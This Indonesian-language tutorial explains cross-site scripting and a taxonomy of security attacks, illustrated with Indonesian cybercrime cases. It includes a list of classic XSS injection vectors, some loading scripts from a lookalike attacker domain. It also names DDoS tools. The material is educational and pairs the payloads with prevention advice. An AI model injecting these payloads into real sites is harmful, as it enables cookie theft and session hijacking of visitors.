Apa itu serangan XSS?

XSS sebenarnya singkatan dari Cross-site Scripting. Jenis serangan ini hanya
diinjeksi pada client-side (sisi klien) saja. Dengan kata lain, serangan macam ini
dapat mengacu code injection attack pada sisi klien. Dimana penyerang dapat
mengeksekusi script berbahaya (yang biasa disebut sebagai payloads)
menjadi situs yang sah atau aplikasi web.

Pada artikel ini, saya akan menganggap bahwa kamu memiliki latar belakang
pengetahuan tentang bagaimana arsitektur Client-Server bekerja secara umum.
Sehingga kita dapat dengan mudah melanjutkan pembahasan tentang XSS ini.

Satu General Aplikasi Web terdiri dari Elemen berikut:

Frontend (Penampilan dari halaman web diuraikan dengan HTML, CSS,

Javascript, d.l.l). Browser mengetahui bagaimana memahami kode,
lalu menampilkan representasi visual.

Backend (Logikanya, fungsionalitas yang disediakan dalam bahasa

pemrograman seperti JAVA, C#, PHP, d.l.l).

Database (Penampung dari data yang disimpan untuk aplikasi).

2. Bagaimana penyerang dapat melakukan

serangan XSS?
Dalam skenario ini, ada 3 buah objek. Yaitu sebuah hosted web, penyerang, dan
korban. Seperti yang saya katakan sebelumnya, payload perlu diinjeksikan ke
situs yang sah. Maksudnya apa bang? Ini berarti bahwa penyerang harus
menemukan cara menggunakan sebuah field input untuk menginjeksi script.
Dan kemudian browser memperlakukan script tersebut seperti kode biasanya
dan mengeksekusinya.

Script dari penyerang kemudian dapat disampaikan kepada para pengunjung.

Lalu javascript akan mengubah representasi visual, atau mengarahkan
pengunjung ke link lain. Atau mungkin juga mengumpulkan data dari browser
pengunjung (biasanya yang diincar penyerang yaitu cookie) yang dapat
mengakibatkan pembajakan, dan hal lainnya.

Jika aplikasi Web rentan terhadap XSS, hal itu akan memungkinkan untuk
mengirim script berbahaya kepada pengunjung. Dan kemudian pengunjung
akan ditipu untuk mengaktifkan script berbahaya tersebut. Serangan XSS dapat
dilakukan dalam VBScript, ActiveX dan Flash. Akan tetapi sebagian besar dibuat
di Javascript, karena Javascript diaktifkan secara default pada semua browser.

3. List vektor XSS yang paling banyak digunakan

<Script> tag:

1 <script src="http://facebok.com/xss.js"></script>
2 <script> alert(Boo!); </script>
<Body> tag:

1 <body onload=alert(Im evil)>

2 <body background=javascript:alert(So Evil)>

<Img> tag:

1 <img src=javascript:alert(Evil);>
2 <img dynsrc=javascript:alert(Bad)>
3 <img lowsrc=javascript:alert(So bad!)>

<Iframe> tag:

1 <iframe src=http://facebok.com/xss.html>

<Input> tag:

1 <input type=image src=javascript:alert(Evil work);>

<Link> tag:

1 <link rel=stylesheet href=javascript:alert(Evil);>

<Table> tag:

1 <table background=javascript:alert(Evil)>
2 <td background=javascript:alert(So evil)>

<Object> tag:

1 <object type=text/x-scriptlet data=http://facebok.com/xss.html>

<Div> tag:

1 <div style=background-image: url(javascript:alert(Evil))>

Contoh-contoh diatas hanya beberapa dari yang paling dikenal. Hal tersebut
saya tunjukan agar kamu tahu bagaimana penyerang menginjeksi. Seperti yang
kamu lihat, jika ada bidang yang rentan, script injeksi akan diuraikan sebagai
kode. Lalu akan dijalankan secara lokal dan dapat digunakan untuk menipu
korban agar mengklik. Lewat hal itu juga penyerang dapat mengumpulkan
beberapa data dan mengarahkan kamu untuk mendapatkan data itu.

4. Bagaimana cara melindungi dari serangan XSS?

Jika kamu ingin melindungi aplikasi kamu dari serangan XSS, bisa mengikuti
beberapa langkah berikut:

Jangan pernah memasukan data tidak terpercaya kecuali di beberapa

lokasi yang diiizinkan.

Escape HTML sebelum data tidak terpercaya masuk ke dalam konten

elemen HTML.

Escape atribut sebelum data tidak terpercaya masuk ke dalam atribut

umum HTML.

Escape JavaScript sebelum data tidak terpercaya masuk ke nilai data

JavaScript.

Escape nilai-nilai JSON dalam konteks HTML dan membaca data

dengan JSON.parse.

Escape URL sebelum data tidak terpercaya masuk ke dalam nilai

parameter URL HTML.

Mengamankan mark-up HTML dengan library.

Pencegahan XSS berbasis DOM.

Gunakan HTTPOnly cookie flag.

 Gunakan sistem auto-escaping template dan menerapkan content
security policy.

Security Attack
Security attacks atau serangan terhadap sistem keamanan jaringan komputer, adalah suatu usaha
untuk mengetahui fungsi di dalam suatu sistem komputer. Secara sederhana, alur informasi yang
benar adalah mengalir dari sumber informasi ke tujuan informasi tanpa ada gangguan selama
perjalanan dari sumber ke tujuan, dan tidak ada informasi yang hilang selama perjalanan
tersebut. Security attack merupakan Segala bentuk pola, cara, metode yang dapat menimbulkan
gangguan terhadap suatu sistem komputer atau jaringan.

Bentuk-bentuk dasar Security Attack :

1. Interruption (interupsi layanan)

Pola ini bekerja dengan menghancurkan suatu aset sistem, sehingga tidak lagi tersedia atau tidak
lagi bisa digunakan. Metoda ini adalah Serangan terhadap layanan availability system. Pada
serangan ini Perangkat sistem menjadi rusak atau tidak tersedia.

Contoh :
a. Perusakan suatu item hardware
b. Pemutusan jalur komunikasi
c. Disable suatu sistem manajemen file
d. Denial of service attack

Serangan interruption bisa dilakukan terhadap komputer dan server. Serangan terhadap komputer
dilakukan dengan merusak Harddisk, memotong kabel koneksi, dll. Sedangkan serangan
terhadap server berupa Denial of Service Attack (Dos Attack) dan DDoS Attack. Bentuk
serangan Denial of Service awal adalah serangan SYN Flooding Attack, yang pertama kali
muncul pada tahun 1996 dan mengeksploitasi terhadap kelemahan yang terdapat di dalam
protokol Transmission Control Protocol (TCP). Serangan-serangan lainnya akhirnya
dikembangkan untuk mengeksploitasi kelemahan yang terdapat di dalam sistem operasi, layanan
jaringan atau aplikasi untuk menjadikan sistem, layanan jaringan, atau aplikasi tersebut tidak
dapat melayani pengguna, atau bahkan mengalami crash.
Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses
seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni
sebagai berikut:
Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang
dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini
disebut sebagai traffic flooding.
Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang
disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat
dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan
menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau
bahkan perusakan fisik terhadap komponen dan server.

Distributed DoS Attack lebih canggih dibanding DoS Attack biasa. Serangan ini menggunakan
beberapa buah komputer sekaligus yang sudah di susupi dengan Trojan Horse agar dapat menjadi
zombie untuk dikendalikan dari jauh oleh penyerang. Setalah si penyerang merasa sudah
memiliki jumlah host zombie yang cukup, komputer master akan memberikan sinyal
penyerangan terhadap jaringan server. Skema serangan DDoS Attack ini sederhana, hanya saja
dilakukan oleh banyak host zombie sehingga menciptakan lalulintas jaringan yang besar.
Akibatnya akan memakan banyak bandwith jaringan target dan akhirnya mengalami
downtime.
Beberapa tools/software yang digunakan untuk melakukan serangan serperti ini adalah TFN,
TFN2K, Trinoo, Stacheldraht, SLOWLORIS (DDoS tools yang dibuat oleh Rsnake, sangat
powerful untuk check IIS server dan web aplikasi), HULK (DDoS tools untuk melakukan load
terhadap http request), THOR HAMMER (tools ddos yang bisa dilakukan dengan menggunakan
Tor application, terutama untuk server yang berbasis apache), dan LOIC yang dapat didownload
di internet secara bebas.
Kegiatan interruption di atas dapat di antisipasi dengan beberapa cara proteksi berikut:
Internet Firewall: untuk mencegah akses dari pihak luar ke sistem internal. Firewall dapat
bekerja dengan 2 cara, yaitu menggunakan filter dan proxy. Firewall filter menyaring komunikasi
agar terjadi seperlunya saja, hanya aplikasi tertentu saja yang bisa lewat dan hanya komputer
dengan identitas tertentu saja yang bisa berhubungan. Firewall proxy berarti mengizinkan
pemakai dalam untuk mengakses internet seluas-luasnya, tetapi dari luar hanya dapat mengakses
satu komputer tertentu saja.
Menutup service yang tidak digunakan.
Adanya sistem pemantau serangan yang digunakan untuk mengetahui adanya tamu/seseorang
yang tak diundang (intruder) atau adanya serangan (attack).
Melakukan back up secara rutin.
Adanya pemantau integritas sistem. Misalnya pada sistem UNIX adalah program tripwire.
Program ini dapat digunakan untuk memantau adanya perubahan pada berkas.
Perlu adanya cyberlaw: Cybercrime belum sepenuhnya terakomodasi dalam peraturan /
Undang-undang yang ada, penting adanya perangkat hukum khusus mengingat karakter dari
cybercrime ini berbeda dari kejahatan konvensional.
Perlunya Dukungan Lembaga Khusus: Lembaga ini diperlukan untuk memberikan informasi
tentang cybercrime, melakukan sosialisasi secara intensif kepada masyarakat, serta melakukan
riset-riset khusus dalam penanggulangan cybercrime.

2. Interception (pengalihan layanan)

Merupakan ancaman terhadap kerahasiaan (secrecy). Informasi yang ada disadap atau orang
yang tidak berhak mendapatkan akses ke komputer dimana informasi tersebut disimpan.
Intersepsi secara definisi merupakan Penyingkapan/pembocoran informasi. Pengaksesan aset
informasi oleh orang yang tidak berhak (misalkan terhadap program atau komputer). Pola ini
merupakan pengerangan terhadap layanan confidentiality suatu arus/aliran lalu-lintas informasi.

Contoh :
a. Pencurian data pengguna kartu kredit
b. Penyadapan (wiretapping)

3. Modification (pengubahan)

Maksud dari pengubahan disini, Pihak yang tidak berwenang tidak saja berhasil mengakses, akan
tetapi dapat juga mengubah aset informasi. Atau bisa juga merupakan Pengaksesan data oleh
orang yang tidak berhak, kemudian ditambah, dikurangi, atau diubah setelah itu baru dikirimkan
pada jalur komunikasi. Metode atau pola ini merupakan jenis serangan terhadap layanan
integrity.
Contoh :
Mengubah isi dan website dengan pesan-pesan yang merugikan pemilik website.
pengubahan suatu nilai file data

Contoh-Contoh Penyerangan jenis Modification

1. Kejahatan yang berhubungan dengan nama domain . Nama domain (domain name)
digunakan untuk mengidentifikasi perusahaan dan merek dagang. Namun banyak orang yang
mencoba menarik keuntungan dengan mendaftarkan domain nama perusahaan orang lain dan
kemudian berusaha menjualnya dengan harga yang lebih mahal. Pekerjaan ini mirip dengan calo
karcis. Istilah yang sering digunakan adalah cybersquatting. Masalah lain adalah menggunakan
nama domain saingan perusahaan untuk merugikan perusahaan lain. (Kasus: mustika-ratu.com)
Kejahatan lain yang berhubungan dengan nama domain adalah membuat domain plesetan,
yaitu domain yang mirip dengan nama domain orang lain. (Seperti kasus klikbca.com) Istilah
yang digunakan saat ini adalah typosquatting.
2. Berita jpnn.com( 27/02/2013) menulis bahwa Badan reserse kriminal (Bareskrim) Polri
melalui Subdit Cyber Crime mencatat lebih dari 350 kasus pidana cyber pernah terjadi di
Indonesia. Yang terbaru adalah aksi Wildan hacker asal Jember Jatim yang berhasil menembus
tampilan website resmi Presiden RI.
3. Pada tanggal 17 April 2004, Dani Hermansyah melakukan deface dengan mengubah nama-
nama partai yang ada dengan nama-nama buah dalam website kpu . Hal ini mengakibatkan
keprcayaan masyarakat terhadap Pemilu yang sedang berlangsung pada saat itu menjadi
berkurang. Dengan berubahnya nama partai di dalam website, maka bukan tidak mungkin angka-
angka jumlah pemilih yang masuk di sana menjadi tidak aman dan bisa diubah.
4. Denpasar Para nasabah Bank Central Asia (BCA) di Kuta, Bali, resah bukan kepalang.
Uang di rekening mereka berkurang tanpa melakukan transaksi sebelumnya. Polisi tengah
menyelidiki kasus ini. Total ada 10 orang nasabah BCA yang kehilangan uang tanpa proses
transaksi. Selain di Kuta, kasus serupa juga menimpa nasabah BCA di Denpasar.Hilangnya uang
tersebut diketahui saat nasabah tersebut akan bertransaksi di BCA Kuta. Jumlah uang nasabah
yang lenyap diperkirakan mencapai puluhan juta. Uang nasabah yang lenyap antara Rp 1 juta
hingga Rp 5 juta. Lenyapnya uang nasabah diduga terjadi secara serentak, hanya dalam rentang
waktu antara 16-19 Januari 2010. (news.detik.com/19/01/2010)
5. indosiar.com, Bandung. Aparat Polsekta Lengkong, Bandung, Jawa Barat, meringkus
seorang tersangka pelaku kejahatan cyber crime.EZR alias Richard Lopez, seorang mahasiswa
sebuah perguruan tinggi swasta di Bandung, diamankan di Mapolsekta Lengkong, setelah
ditangkap disebuah warnet. Tersangka pelaku kejahatan cyber crime atau dikenal dengan istilah
carding ini diduga telah berhasil melakukan transaksi sejumlah barang pesanan lewat internet
menggunakan kartu kredit orang lain yang telah digandakan, hingga menghasilkan kartu kredit
baru yang memiliki akses dan dana.Tersangka mengaku kepada petugas sudah melakukan aksi
kejahatannya sejak tahun 2001 lalu. Dalam aksi kejahatannya melalui sebuah website di internet,
tersangka berhasil melakukan transaksi sejumlah barang dari Belanda dan Finlandia.Dari seluruh
hasil kejahatan tersangka, aparat baru berhasil menyita sebagiannya saja, diantaranya
seperangkat komputer, sebuah tenda dan tiga buah alat tato senilai 40 juta rupiah. Aparat masih
mengembangkan kasus untuk bisa mengungkap jaringan carding lai

4. Fabrication (produksi - pemalsuan)

Pihak yang tidak berwenang menyisipkan objek palsu ke dalam sistem. Atau seorang user yang
tidak berhak mengambil data, kemudian menambahkannya dengan tujuan untuk dipalsukan.
Fabrication merupakan serangan terhadap layanan authentication.
Contoh :
Memasukkan pesan-pesan palsu seperti email palsu ke dalam jaringan computer.

Contoh kasus dalam :

Data diddling, diartikan sebagai suatu perbuatan yang mengubah data valid atau sah dengan cara
yang tidak sah, yaitu dengan mengubah input data atau output data. Tindakan ini dapat
dikategorikan sebagai tindak pidana pemalsuan surat (Pasal 263 KUHP). Upaya yang dilakukan
oleh BPHN yang melakukan penafsiran terhadap berbagai ketentuan yang ada khususnya
ketentuan KUHP terhadap aktivitas cybercrime, kiranya sudah cukup baik dalam upaya
menanggulangi aktivitas cybercrime yang sudah sangat nyata berada di tengah-tengah kita,
meskipun baru sebatas suatu upaya untuk mengisi kekosongan hukum. Akan tetapi sebagaimana
telah disebutkan di muka, perbedaan konsep mengenai ruang dan waktu dari ketentuan hukum
Pidana dengan sifat khas dari cybercrime, dapat membawa kesulitan dalam penerapannya,
bahkan untuk beberapa pasal penerapan KUHP terhadap aktivitas di cyberspace patut untuk
dipertanyakan.
Modus membobol Citibank ini sederhana, hanya manipulasi data dan mengalihkan dana nasabah
ke rekening tersangka. Tersangka menggunakan trik menyulap blangko investasi kosong yang
ditandatangani nasabah untuk pencairan dana. Tingkat kepercayaan tinggi dari nasabah kepada
tersangka yang telah bekerja selama 20 tahun di Citibank membuat pelaku dengan mudah
mengeruk uang dalam jumlah besar.
Kenyataan ini makin mengiris tipis kepercayaan masyarakat pada dunia perbankan. Bagaimana
tidak, selama ini kita sering dibuai promosi perbankan mengenai kehebatan dan keandalan
teknologi. Begitu pula sistem dan standar prosedur yang sudah relatif lebih baik dari sisi
keamanannya.
Namun, seiring dengan hal itu kita juga disodori banyaknya kasus penipuan dan pembobolan
(fraud) yang dilakukan oleh oknum internal perbankan itu sendiri. Menurut saya, ada tiga hal
mendasar yang menyebabkan kasus pembobolan bank di Indonesia kian hari kian
mengkhawatirkan.
Pertama: rusaknya fungsi hukum sebagai rambu-rambu kejahatan.Selama ini tidak ada hukuman
berat terhadap pelaku pembobol bank sehingga kemudian beredar pemeo di kalangan pembobol
bank, Kalau membobol bank jangan tanggung-tanggung. Yang besar sekalian. Setelah itu cukup
keluar beberapa miliar rupiah untuk oknum penegak hukum maka semuanya akan beres.
Kedua: lemahnya sistem pengawasan Bank Indonesia (BI) mengingat keterbatasan SDM
sehingga mereka mengalami kesulitan mengawasi kantor-kantor cabang terutama di daerah-
daerah, meskipun di daerah itu terdapat kantor perwakilan BI. Dalam hal ini, bank sentral itu
mestinya bisa menggunakan instrumen forum bankir di daerah untuk memperbaiki kontrol
internal bank.
Ketiga: lemahnya koordinasi BI pusat dan daerah. Fungsi monitoring BI hanya mengandalkan
laporan bank itu. Akses BI ke informasi bank sangat terbatas sehingga jika terjadi pembobolan,
sudah terlambat bagi BI untuk melakukan sesuatu. Kondisi inilah yang perlu dibenahi, artinya ke
depan BI tidak boleh hanya mengandalkan laporan dari bank, namun harus proaktif menggali
informasi di luar laporan bank.
Phising Mail,Email yang seolah-olah dikirim dari bank di tempat kita menyimpan uang, dari
situs tempat kita membeli barang secara online. Bila kita login ke dalam situs palsu tersebut
maka situs itu akan mencuru username dan password yang akan merugikan kita.
Berasal dari bahasa Inggris yang berarti pengelabuan. Phishing berupa webpage yang alamatnya
mirip dengan web aslinya. Misalnya www.klikbca.com diubah menjadi www.clickbca.com atau
www.klikkbca.com. Jika dilihat dari ketiganya memiliki pelafalan yang sama, tetapi tujuanya
berbeda. Klick BCA bertujuan untuk mengakses suatu alamat bank swasta di Indonesia, tetapi
click BCA bertujuan ke suatu komputer dimana pemiliknya mengetahui username dan password
anda jika anda memasuki web tersebut.

Kerugian dari Fabrication

1. Jika korbannya adalah web e-commerce (seperti amazon.com, klickbca.com) gagalnya
sistem keamanan walau hanya beberapa menit/jam akan sangat menurunkan income perusahaan.
2. Jika perusahaan,bisa jadi rencana-rencana pengembangan diketahui oleh perusahaan saingan
atau sistem di dalam dirusak sehingga mengganggu proses produksi.
3. Jika institusi militer maka dokumen-dokumen rahasia berupa pengembangan-pengembangan
sistem keamanan bisa dibajak oleh pihak-pihka yang menginginkannya.
4. Jika organisasi politik atau pemerintah,hal ini akan membuat efek yang buruk bagi
organisasi/institusi tersebut tergantung apa yang dilakukan cracker.